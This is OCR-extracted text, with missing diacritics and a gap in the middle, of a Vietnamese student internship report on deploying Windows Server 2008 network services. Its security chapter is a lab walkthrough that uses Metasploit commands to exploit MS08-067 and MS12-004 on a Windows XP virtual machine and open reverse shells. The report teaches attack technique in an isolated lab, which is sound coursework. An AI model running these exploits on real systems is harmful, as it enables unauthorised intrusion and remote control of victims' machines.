ĐẠI HỌC NGUYỄN TẤT THÀNH KHOA CÔNG NGHỆ THÔNG TIN TRUNG TÂM ĐÀO TẠO QUẢN TRỊ MẠNG & AN NINH MẠNG QUỐC TẾ ATHENA BÁO CÁO ĐỀ TÀI THỰC TẬP Nghiên cứu triển khai dịch vụ mang Windows server 2008 GVHD: Hồ Văn Ngọc SVTH: Đinh Nguyễn Duy Khánh MSSV: 1211508781 TRUNG TÂM ĐÀO TẠO MẠNG VÀ AN NINH MẠNG QUỐC TẾ ATHENA CỘNG HÒA XÃ HỘI CHỦ NGHĨA VIỆT NAM Độc lâp – Tự – Hạnh phúc NHIỆM VỤ THỰC HIỆN KHÓA LUẬN Họ tên SV : Đinh Nguyễn Duy Khánh MSSV: 1211508781 Chuyên ngành: Công Nghệ Thông Tin Tên đề tài: Nghiên cứu triển khai dịch vụ mạng Windows Server 2008 Nội dung thực hiện: Lý thuyết: Nắm vững bước thực quản trị Windows Server 2008 Có khả tự thiết lập mạng máy tính, cấu hình mạng, điều chỉnh khả hoạt động mạng máy tính, vận hành hệ thống mạng, giải cố, phương pháp bảo vệ Thực hành: Cài đặt Windows Server 2008 Nâng cấp Stand Alone thành Domain controller Cài đặt Windows XP Join Domain cho windows XP Tạo user account AD, thiết lập policy cho phép User quyền thay đổi ngày hệ thống Backup cho Domain Controller Quản lý dịch vụ DNS, Mail, DHCP, Web, VPN môi trường Local Internet Thực kết nối VPN, Mail Server, Web Server máy chủ ảo VPS Bảo mật Windows với khai thác mã lỗi Windows Xp VPS Thời gian thực hiện: 16/3/2015 đến 16/05/2015 Chữ ký SV: GIÁM ĐỐC TRUNG TÂM (Ký ghi rõ họ tên) TP.HCM, Ngày 16 tháng năm 2015 GIẢNG VIÊN HƯỚNG DẪN (Ký ghi rõ họ tên) LỜI CẢM ƠN Trên thực tế khơng có thành cơng mà không gắn liền với hỗ trợ, giúp đỡ dù hay nhiều, dù trực tiếp hay gián tiếp người khác Trong suốt thời gian từ bắt đầu học tập giảng đường đến nay, em nhận nhiều quan tâm, giúp đỡ q Thầy Cơ, gia đình bạn bè Với lời biết ơn sâu sắc nhất, em xin gửi đến quý Thầy Cô Khoa Công Nghệ Thông Tin – Trường Đại Học Nguyễn Tất Thành, giáo viên hướng dẫn Hồ Văn Ngọc giúp đỡ dạy chúng em suốt thời gian học tập trường Và đặc biệt, học kỳ Khoa tổ chức cho chúng em thực tập tiếp cận với mơn học mà theo em hữu ích sinh viên ngành Công Nghệ Thông Tin Em xin chân thành cảm ơn Thầy Võ Đỗ Thắng tận tâm hướng dẫn chúng em qua buổi thực tập Trung Tâm ATHENA buổi nói chuyện, thảo luận Nếu khơng có lời hướng dẫn, dạy bảo thầy thầy em nghĩ báo cáo em khó hồn thiện Một lần nữa, em xin chân thành cảm ơn thầy Bài báo cáo thực khoảng thời gian gần tháng Bước đầu vào thực tế, tìm hiểu, kiến thức em hạn chế nhiều bỡ ngỡ Do vậy, không tránh khỏi thiếu sót điều chắn, em mong nhận ý kiến đóng góp quý báu quý Thầy Cô bạn học lớp để kiến thức em lĩnh vực hoàn thiện Sau cùng, em xin kính chúc q Thầy Cơ Khoa Công Nghệ Thông Tin Thầy Võ Đỗ Thắng thật dồi sức khỏe, niềm tin để tiếp tục thực sứ mệnh cao đẹp truyền đạt kiến thức cho hệ mai sau Trân trọng TP.HCM, Ngày 16/05/2015 Sinh viên thực …………………………… NHẬN XÉT CỦA GIÁO VIÊN HƯƠNG DẪN  Họ tên người hướng dẫn: Nhận xét báo cáo thực tập học sinh/sinh viên: Lớp: Khóa: Tên báo cáo(đề tài)/nội dung báo cáo: Nội dung nhận xét: Điểm (số): TP.Hồ Chí Minh ngày… tháng… năm 2015 GIÁO VIÊN HƯỚNG DẪN MỤC LỤC CHƯƠNG 1: GIỚI THIỆU TRUNG TÂM ATHENA I.Giới thiệu doanh nghiệp thực tập – Trung Tâm Đào Tạo Quản Trị Mạng An Ninh Mạng Quốc Tế ATHENA 1 Trụ sở chi nhánh: 1.1 Trụ sở chính: 1.2.Cơ sở 2_Tại TP Hồ Chí Minh: 2.Quá trình hình thành phát triển trung tâm: 3.Cơ cấu tổ chức: 4.Các sản phẩm, giải pháp: 4.1Các khóa học dài hạn: 4.2Các khóa học ngắn hạn: 4.3 Các sản phẩm khác 4.4 Cơ sở hạ tầng 4.5 Các dịch vụ hỗ trợ: 5.Khách hàng 6.Đối tác II.CÁC NHIỆM VỤ VÀ DỊCH VỤ CỦA BỘ PHẬN THỰC TẬP III.CÔNG VIỆC VÀ NHIỆM VỤ ĐƯỢC PHÂN CÔNG IV.THỜI GIAN THỰC TẬP CHƯƠNG 2: NỘI DUNG THỰC TẬP I.Nhiệm vụ giao II.Kiến thức tìm hiểu 1.Giải pháp mạng doanh nghiệp 1.1.Giới thiệu mạng doanh nghiệp 1.2.Các thành phần công nghệ mạng doanh nghiệp 2.Windows Server 2008 Giới thiệu mơ hình Client-Server CHƯƠNG 3: TỔNG QUAN VỀ WINDOWS SERVER 2008………………….10 I.GIỚI THIỆU WINDOWS SERVER 2008 10 II.CÁC TÍNH NĂNG CỦA WINDOWS SERVER 2008 10 1.Công cụ quản trị Server Manager 10 2.Windows Server Core 11 3.PowerSell 11 Windows Deloyment Services 12 5.Terminal Services 12 6.Network Access Protection 12 7.Read-Only Domain Controllers 13 8.Công nghệ Failover Clustering 13 9.Windows Firewall with Advance Security 13 III.MỘT SỐ TÍNH NĂNG MỚI CỦA WINDOWS SERVER 2008 14 1.Cơng nghệ ảo hóa Hyper-V 14 2.Processor Compatibility Mode 14 3.File Classification Infrastructure 14 4.Quản lý ổ đĩa file 15 5.Cải tiến giao thức mã hóa 15 6.Một số tính khác 15 IV.CÁC LỢI ÍCH CỦA WINDOWS SERVER 2008 15 1.Web 15 2.Ảo hóa 16 3.Bảo mật 16 3.1Network Access Protection(NAP) 16 3.2Read-Only Domain Controller(RODC) 16 3.3BitLocker 17 3.4Windows Firewall 17 V.CÁC PHIÊN BẢN CỦA WINDOWS SERVER 2008 17 1.Windows Server 2008: ứng dụng cho trung tâm data lớn, ứng dụng nghiệp vụ riêng, khả mở rộng cao 64 xử lý 17 2.Windows Server 2008 Standard Edition 17 3.Windows Server 2008 Enterprise Edition 17 4.Windows Server 2008 Datacenter Edition 17 5.Windows Web Server 18 CHƯƠNG 4: CÀI ĐẶT WINDOWS SERVER 2008 19 I.YÊU CẦU PHẦN CỨNG 19 II.CÁC CÁCH CÀI ĐẶT 19 III NÂNG CẤP LÊN WINDOWS SERVER 2008 19 IV.CÁI ĐẶT WINDOWS SERVER 2008 20 CHƯƠNG 5: DỰNG DOMAIN CONTROLLER &JOIN DOMAIN 24 I.DỰNG DOMAIN 24 II.JOIN DOMAIN 28 CHƯƠNG : TRIỄN KHAI CÁC DỊCH VỤ MẠNG 30 I Dịch vụ DNS 30 Giới thiệu DNS 30 Cài đặt DNS 30 Cấu hình DNS 31 II DỊCH VỤ DHCP 34 Giới thiệu DHCP 34 Cài đặt DHCP 34 Cấu hình DHCP 36 III Tìm hiểu VNP 38 Khái niệm 39 Các loại VNP 39 Bảo mật VPN 40 Sản phẩm công nghệ dành cho VPN 41 Bộ xử lý trung tâm VPN 42 Router dùng cho VPN 42 Tường lửa PIX Cisco 42 IV VPN Site to Site 42 Chuẩn bị 42 Đặt IP cho máy 42 Tiến hành cài đặt cấu hình 42 V IIS 7.0 50 Giới thiệu IIS 50 Những điểm IIS 7.0 50 Cài đặt IIS 50 Cấu hình IIS 51 VI FTP 53 1.FTP 53 Cài đặt FTP 53 Cấu hình FTP 55 CHƯƠNG 7: BACKUP & RESTORE 58 Cài đặt 58 Backup 58 Restore 60 CHƯƠNG 8: MAIL TRÊN VPS 63 I Cấu hình cài đặt Mdeamonv10 63 CHƯƠNG 9: BẢO MẬT WINDOWS 70 I.Khai thác lỗ hỏng Windows XP với mã lỗi MS08_067 70 II.Khai thác lỗ hỏng Windows XP với mã lỗi MS12_004 72 CHƯƠNG 10: KẾT LUẬN 78 I Các kết đạt 78 II Kinh nghiệm thực tế 78 III Hoàn thiện thân 78 IV Các kiến thức lĩnh hội 78 V Kết luận 79 CHƯƠNG 11:TÀI LIỆU THAM KHẢO 80 LỜI MỞ ĐẦU Ngày với phát triển khoa học kỹ thuật máy tính trở nên phổ biến với người Chúng mang lại cho người khả to lớn làm công việc phi thường: tính tốn nhanh xác tốn phức tạp, điều khiển tự động, giải trí… Máy tính đời không hỗ trợ sản xuất mà cịn việc học tập làm góp phần giải phóng sức lao động Máy tính điện tử phát minh, thành tựu to lớn cho phát triển nhân loại góp phần thúc đẩy mạnh mẽ tiến khoa học kỹ thuật nói riêng nhân loại nói chung Bên cạnh phát triển chóng mặt máy tính thời buổi cơng nghệ thơng tin ứng dụng, dịch vụ mạng tản khơng thể tách rời Sức mạnh máy tính nhân lên gấp nhiều lần kết nối thành mạng máy tính Là sở hạ tần cho phép trao đổi thông tin, truyền tải liệu từ xa nhằm rút ngắn khoảng cách Với mạng máy tính toàn cầu dễ dàng tiếp cận với phát triển giới có phát triển gần Windows Server Windows Server 2000 Windows Server 2003 tiếp đến Windows Server 2008 hỗ trợ tốt dịch vụ mạng cần thiết Server, việc cải tiến không ngừng giúp nâng cao tính ổn định an tồn cho Windows Server 2008 hoạt động cách trơn tru Hiện trình cơng nghiệp hóa đại hóa đất nước chủ trương hàng đầu nhà nước Mạng máy tính trở thành mục tiêu nghiên cứu phát triển Cốt lõi ngành công nghệ thông tin bao gồm nhiều lĩnh vực từ kiến trúc mạng đến nguyên lý thiết kế, cài đặt mơ hình ứng dụng v.v… Mạng viễn thơng nói chung mạng máy tính tảng Windows Server 2008 nói riêng cơng cụ hũu dụng thiếu máy nhà nước, trường học, doanh nghiệp… Nó đóng vai trị cầu nối trao đổi thơng tin phủ, tổ chức xã hội người với Qua thời gian học tập nghiên cứu ghế nhà trường với hỗ trợ tận tình Thầy cơ, bạn bè người thân giúp em thu thập nhiều kiến thức quý báo Đặc biệt trình thực tập Trung tâm ATHENA giúp em có trải nghiệm vơ thú vị bổ ích Với mong muốn tìm hiểu mạng máy tính góp phần xây dựng mạng máy tính thân thiện, thơng minh cho người sử dụng Tuy có nhiều cố gắng song khơng thể tránh khuyết điểm, sai sót mong thơng cảm ý kiến đóng góp q báo từ Q Thầy Cơ, bạn bè, bạn đọc, người thân để em ngày hồn thiện thân Xin chân thành cảm ơn! CHƯƠNG 1: GIỚI THIỆU VỀ TRUNG TÂM ATHENA: I.Giới thiệu doanh nghiệp thực tập – Trung Tâm Đào Tạo Quản Trị Mạng An Ninh Mạng Quốc Tế ATHENA Trung Tâm Đào Tạo Quản Trị Mạng An Ninh Mạng Quốc Tế ATHENA_Tiền thân Công ty TNHH Tư vấn Đào tạo quản trị mạng Việt Năng, (tên thương hiệu viết tắt TRUNG TÂM ĐÀO TẠO ATHENA), thức thành lập theo giấy phép kinh doanh số 4104006757 Sở Kế Hoạch Đầu Tư Tp Hồ Chí Minh cấp ngày 04 tháng 11 năm 2008 - Tên cơng ty viết tiếng nước ngồi: ATHENA ADVICE TRAINING NETWORK SECURITY COMPANY LIMITED - ATHENA tổ chức quy tụ nhiều trí thức trẻ Việt Nam đầy động, nhiệt huyết kinh nghiệm lĩnh vực cơng nghệ thơng tin Với tâm góp phần vào cơng thúc đẩy tiến trình tin học hóa nước nhà ATHENA tập trung chủ yếu vào họat động sau:  Đào tạo chuyên sâu quản trị mạng, an ninh mạng, thương mại điện tử theo tiêu chuẩn quốc tế hãng tiếng Microsoft, Cisco, Oracle, Linux LPI , CEH, Song song đó, trung tâm ATHENA cịn có chương trình đào tạo cao cấp dành riêng theo đơn đặt hàng đơn vị Bộ Quốc Phòng, Bộ Công An , ngân hàng, doanh nghiệp, quan phủ, tổ chức tài Qua cung cấp nguồn nhân lực lĩnh vực công nghệ thông tin, đặc biệt chuyên gia mạng máy tính bảo mật mạng đạt trình độ quốc tế cho tổ chức, doanh nghiệp có nhu cầu  Tư vấn hổ trợ cho doanh nghiệp ứng dụng hiệu tin học vào hoạt động sản xuất kinh doanh  Tiến hành hoạt động nghiên cứu nâng cao kiến thức tin học phát triển sở liệu thông tin ứng dụng cố mạng  Tiến hành dịch vụ ứng cứu khẩn cấp cho doanh nghiệp trường hợp xảy cố máy tính Sau gần 10 năm hoạt động,nhiều học viên tốt nghiệp trung tâm ATHENA chuyên gia đảm nhận công tác quản lý hệ thống mạng, an ninh mạng cho nhiều ngành Cục Công Nghệ Thơng Tin - Bộ Quốc Phịng , Bộ Cơng An, Sở Thông Tin Truyền Thông tỉnh, bưu điện tỉnh,… Ngồi ra, Trung tâm ATHENA cịn có nhiều chương trình hợp tác trao đổi cơng nghệ với nhiều đại học lớn đại học Bách Khoa Thành Phố Hồ Chí Minh, Học Copy dãy chữ số paste vào Registration Key Sau paste key vào ta click Next.Lưu ý không check vào Install the Limited.Đợi trình cài đặt hồn tất Hình 8.7 mail mdeamon cài đặt Điền domain (mà ta ký dot.tk lúc vào) Domain name Hình 8.8 nhập domain Điền vào tên địa mail mật cho tài khoảng admin Hình 8.9 tạo tài khoản admin để quản trị mail 66 Điền vào IP VPS : Hình 8.10 khai báo địa ip dns Click Next Click finish để hồn tất q trình cài đặt Hình 8.11 hồn tất q trình cài đặt Vào start -> all progamar -> Mdeamon -> Start Mdeamon để khỏi động Mdaemon lên tạo User mail Để bỏ giới hạn password->account->account setting>bỏ check requite strong pw 67 Hình 8.12 tắt chế độ mật phức tạp mdeamon Ta vào Account>>New Account để tạo users Ta tạo User tk1 tk2 password 123 Xem cấu hình tài khoản:vào account>edit account Hình 8.13 account tạo Test Trong IE gõ địa http://192.168.1.1:3000 để vào WorldClient Đăng nhập tài khoản tk1 Hình 8.14 giao diện world client 68 Trên mail server ta dùng tài khoản tk1 gửi mail cho tài khoản tk2 Hình 8.15 gửi mail test đến cho tài khoản tk2@athena.edu.vn Đăng xuất đăng nhập tương tự vào tài khoản tk2 Hình 8.16 tài khoản tk2 có mail gửi đến từ tài khoản tk1 Ta thấy tin nhắn từ tài khoản tk1 Hình 8.17 gửi mail mdeamon thành cơng Kết thúc mail mdeamon 69 CHƯƠNG 9: BẢO MẬT WINDOWS I.Khai thác lỗ hổng Windows XP với mã lỗi MS08_067 Chuẩn bị máy ảo: Windows XP (nạn nhân) máy Back Track 5r3 (máy công nạn nhân) Trên máy Back Track cấu hình địa IP lab cho máy là: 192.168.154.128 Các bước thực hiện: Kiểm tra mạng XP máy Back Track 5r3: Máy Back Track 5r3: Hình 9.1 địa ip máy backtrack Máy Xp: Hình 9.2 địa ip máy XP Trên máy Back track 5r3 ta gõ đường dẫn: cd /pentest/exploits/framework 70 Hình 9.3 di chuyển đến thư muc framework Ta tiếp tục gõ lệnh: /msfcli windows/smb/ms08_067_netapi RHOST=192.168.154.129 LHOST=192.168.154.128 PAYLOAD=windows/shell/reverse_tcp Hình 9.4 Trong RHOST IP máy Xp, LHOST IP máy Back track 5r3 Sau đó, ta chờ cho máy Back track 5r3 công Xp 71 Hình 9.5 hệ thống load module Cuối ta công Xp, ta biết thông số máy XP Hình 9.6 cơng thành cơng II.Khai thác lỗi hệ thổng Windows XP với mã lỗi MS12_004 Máy Backtrack 5r3 có IP 192.168.1.2, máy xp có IP 192.168.1.3 Trên máy Back track vào chương trình terminal gõ lệnh msfconsole 72 Hình 9.7 giao diện backup vào metasploit Tìm mã lỗi công cụ metaploit cách gõ lệnh search ms12_004 Hình 9.8 tìm mã lỗi muỗn khai thác Sau seach mã lỗi ta dùng lệnh use copy mã lỗi tìm được: use exploit/windows/browser/ms12_004_midi 73 Hình 9.9 sử dụng mã lỗi ms12_004_midi Dùng lệnh SRVHOST  Hình 9.10 thiết lập srvhost Dùng lệnh set PAYLOAD windows/meterpreter/preverse_tcp Hình 9.11 thiết lập payload 74 Dùng lệnh set LHOST  Hình 9.12 thiết lập lhost Dùng lệnh exploit để tiến hành khai thác lỗi Chú ý đường dẫn http://192.168.1.2:8080/nếu máy nạn nhân vào đường dẫn bị hack Hình 9.13 exploit để bắt đầu khai thác lỗi Trở lại máy Windows XP,với địa ip máy XP 192.168.1.3Trên máy XP ta vào trình duyệt web gõ đường dẫnhttp://192.168.1.2:8080/ Hình 9.14 máy XP truy cập vào link cài mã độc 75 Trên máy Back Track bắt đầu nhận thấy có kết nối đến địa Hình 9.15 máy backtrack công thành công vào máy XP Trên máy back track ta gõ lệnh sessions để kiểm tra Hình 9.16 thơng tin máy bị chiếm quyền điều khiển Gõ lệnh shell để vào ổ đĩa máy XP: Hình 9.17 truy cập đến ổ C win XP máy backtrack Giờ ta xem file ổ đĩa máy XP 76 Hinh 9.17 file có ổ C máy XP 77 CHƯƠNG 10: KẾT LUẬN - - - I.Các kết đạt Sau tìm hiểu triển khai dịch vụ máy ảo VMWare VPS em có kiến thức về: Nguyên lý hệ điều hành mạng, kiến thức hệ thống mạng, có kỹ cần thiết để cài đặt, cấu hình hồn chỉnh mạng doanh nghiệp cỡ vừa lớn dựa vào Windows Server 2008 Hiểu cấu trúc hạ tầng, thiết kế quản trị hệ thống mạng, nhiệm vụ quản lý bao gồm việc điều hành hỗ trợ hệ thống Triển khai, thiết kế, quản lý chuẩn đoán hỏng hóc cho hệ thống mạng Có kiến thức tảng công nghệ Windows Server 2008 II.Kinh nghiệm thực tế  Có nhìn thực tế việc cấu hình, quản lý hệ thống mạng doanh nghiệp thông qua tảng  Được trực tiếp tiếp xúc công nghệ thiết bị mà trước biết đến thông qua sách  Được vận dụng kiến thức tiếp thu lớp vào công việc thực tế  Bổ sung trau dồi thiếu sót kiến thức q trình học lớp  Trực tiếp triển khai cấu hình máy chủ ảo VPS  Có kinh nghiệm việc khắc phục cố hệ thống gặp lỗi III Hoàn thiện thân  Các thành viên nhóm định hướng rõ ràng mục tiêu tới làm  Tự tin việc giao tiếp với người công việc  Nâng cao khả làm việc nhóm khả tự thân giải vấn đề khó khăn gặp phải công việc IV.Các kiến thức lĩnh hội  Kiến thức thực tế hệ thống mạng doanh nghiệp  Hiểu thành phần công nghệ mạng doanh nghiệp vừa nhỏ 78 V Kết luận Nhìn chung cơng việc em hồn thành, nhiên cịn nhiều thiếu sót, đa phần q trình tự học Vì mong Thầy cơ, bạn đánh giá đưa ý kiến đóng góp để khắc phục sửa chữa Bên cạnh trình độ chuyên mơn cần có kỹ mềm kỹ giao tiếp, làm việc nhóm quan trọng Thực tập giai đoạn quan trọng sinh viên, giúp sinh viên có hội làm việc thực tế nhằm củng cố kĩ năng, chuẩn bị cho giai đoạn làm việc thật sau tốt nghiệp Trong trình thực tập Trung tâm ATHENA, nhóm chúng em tiếp xúc với môi trường làm việc chuyên nghiệp, cơng nghệ, thiết bị,các mơ hình thực tế Qua nhóm học hỏi kinh nghiệm định có suy nghĩ đóng góp sau:  Về công việc: Để thiết kế triển khai hệ thống mạng cho cơng ty, cần có nhiều phận phối hợp với để thực hoàn thành dự án  Về phát triển kỹ năng:Để phận phối hợp tốt nhân viên cần có kỹ để làm việc đội, nhóm: o Làm việc nhóm: Kỹ làm việc nhóm khả làm việc hiệu đội ngũ Đó việc sử dụng người để có kết tốt ln sẵn sàng để lãnh đạo phối hợp làm theo o Tìm hiểu – thu thập thông tin: Quản lý thông tin khả biết nơi để có thơng tin cần thiết - để tìm kiếm, định vị, thu thập Điều liên quan đến việc sử dụng nguồn lực khác nhau, cho dù chúng từ người từ tài liệu giới rộng lớn công nghệ o Kỹ giải vấn đề - Tính linh hoạt : Tính linh hoạt khả thích nghi để giải cơng việc gặp phải hàng ngày công việc lẫn đời sống riêng Giải vấn đề xác định vấn đề, nghiên cứu giải pháp đưa định hiệu  Về công nghệ: với lợi công ty hoạt động lĩnh vực công nghệ thơng tin ,ATHENA có hạ tầng CNTT đại ,an tồn thơng suốt 79 CHƯƠNG 11: TÀI LIỆU THAM KHẢO YOUTUBE: - Domain & Join Domain: - DHCP - DNS - Web & FTP - Mdeamon - VPN site to site SLIDESHARE: http://www.slideshare.net/bosua94/report-ver1140815234705phpapp01 80